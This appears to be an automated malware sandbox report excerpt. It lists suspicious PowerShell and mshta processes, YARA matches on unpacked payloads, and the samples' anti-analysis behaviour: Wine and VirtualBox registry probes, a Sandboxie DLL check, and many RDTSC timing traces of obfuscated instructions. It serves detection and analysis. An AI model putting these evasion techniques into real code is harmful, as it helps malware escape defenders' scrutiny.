Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: k6Sly2p.exe PID: 5796, type: MEMORYSTR
Source: Yara match File source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AD13C second address: 4AD142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AD142 second address: 4AD162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5BC10A35F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BC10A3603h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AC2D1 second address: 4AC2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F5BC10B7098h 0x0000000b pushad 0x0000000c js 00007F5BC10B7096h 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F5BC10B7096h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AC2F2 second address: 4AC305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ja 00007F5BC10A360Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AC305 second address: 4AC309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AC309 second address: 4AC30F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AC459 second address: 4AC45F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AC59C second address: 4AC5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jl 00007F5BC10A35FEh 0x0000000f push esi 0x00000010 pop esi 0x00000011 jg 00007F5BC10A35F6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007F5BC10A35FEh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AC729 second address: 4AC72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AF0A7 second address: 4AF0B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5BC10A35F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AF0B1 second address: 4AF0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AF0B5 second address: 4AF0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F5BC10A360Fh 0x0000000f push ebx 0x00000010 jmp 00007F5BC10A3607h 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a ja 00007F5BC10A3604h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 pop edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AF0FD second address: 4AF107 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5BC10B709Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AF206 second address: 4AF20B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AF20B second address: 4AF269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 298AC1A2h 0x0000000e mov edx, dword ptr [ebp+122D33FEh] 0x00000014 push 00000003h 0x00000016 mov di, 0B90h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F5BC10B7098h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 mov esi, dword ptr [ebp+122D353Ah] 0x0000003c mov si, 1EC8h 0x00000040 push 00000003h 0x00000042 sub di, E20Bh 0x00000047 push 49B6E6D2h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007F5BC10B709Bh 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AF269 second address: 4AF26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AF26E second address: 4AF296 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10B709Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 7649192Eh 0x00000011 mov edx, 2B29BBECh 0x00000016 lea ebx, dword ptr [ebp+12453FD8h] 0x0000001c push eax 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AF3F0 second address: 4AF3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AF3F4 second address: 4AF3FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AF3FE second address: 4AF422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4AF46C second address: 4AF475 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4C24FD second address: 4C2503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4CE5E4 second address: 4CE609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F5BC10B70A3h 0x0000000d jnc 00007F5BC10B7096h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4CE609 second address: 4CE617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5BC10A35F6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4CE8AC second address: 4CE8B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4CE8B2 second address: 4CE8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4CF1A3 second address: 4CF1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4CF1A9 second address: 4CF1AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4CF1AD second address: 4CF1B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4CF1B1 second address: 4CF1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 js 00007F5BC10A35F6h 0x0000000d jnl 00007F5BC10A35F6h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4CF1C5 second address: 4CF1D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F5BC10B7096h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4CF1D9 second address: 4CF1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4CF46C second address: 4CF48E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5BC10B70A4h 0x0000000d js 00007F5BC10B7096h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 493A8E second address: 493AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 493AA6 second address: 493AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 493AAA second address: 493AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jne 00007F5BC10A35F6h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4CF61E second address: 4CF633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BC10B709Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4A6250 second address: 4A6256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4A6256 second address: 4A6260 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5BC10B7096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4A6260 second address: 4A629D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F5BC10A35F6h 0x0000000d jc 00007F5BC10A35F6h 0x00000013 ja 00007F5BC10A35F6h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push edx 0x00000020 pop edx 0x00000021 jmp 00007F5BC10A3606h 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4A629D second address: 4A62B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B70A3h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 49BFA5 second address: 49BFA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DC292 second address: 4DC29C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F5BC10B7096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DC29C second address: 4DC2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DC866 second address: 4DC873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F5BC10B7096h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DC873 second address: 4DC87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DC9F7 second address: 4DC9FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DE29C second address: 4DE2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DE2A0 second address: 4DE2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DE2A6 second address: 4DE2CA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5BC10A35FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F5BC10A35F6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DE2CA second address: 4DE2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnc 00007F5BC10B709Eh 0x0000000f je 00007F5BC10B7098h 0x00000015 push edi 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e push eax 0x0000001f pop eax 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DE2EB second address: 4DE2F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DE40E second address: 4DE414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DE57B second address: 4DE585 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DE585 second address: 4DE589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DE829 second address: 4DE82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DED7B second address: 4DED7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DEE05 second address: 4DEE0F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DEE0F second address: 4DEE14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DEE14 second address: 4DEE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c mov esi, ecx 0x0000000e nop 0x0000000f jmp 00007F5BC10A3604h 0x00000014 push eax 0x00000015 ja 00007F5BC10A3602h 0x0000001b jne 00007F5BC10A35FCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DF21E second address: 4DF224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DF224 second address: 4DF229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DF841 second address: 4DF845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4DF845 second address: 4DF8A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F5BC10A35F8h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F5BC10A3601h 0x00000015 nop 0x00000016 add di, D572h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F5BC10A35F8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 mov dword ptr [ebp+122D19EAh], ecx 0x0000003d push 00000000h 0x0000003f or di, 4F1Eh 0x00000044 push eax 0x00000045 push ebx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E0280 second address: 4E0286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E0286 second address: 4E028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E13DB second address: 4E13DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E344D second address: 4E3451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E3245 second address: 4E324B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E3451 second address: 4E346A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F5BC10A35FCh 0x0000000c popad 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
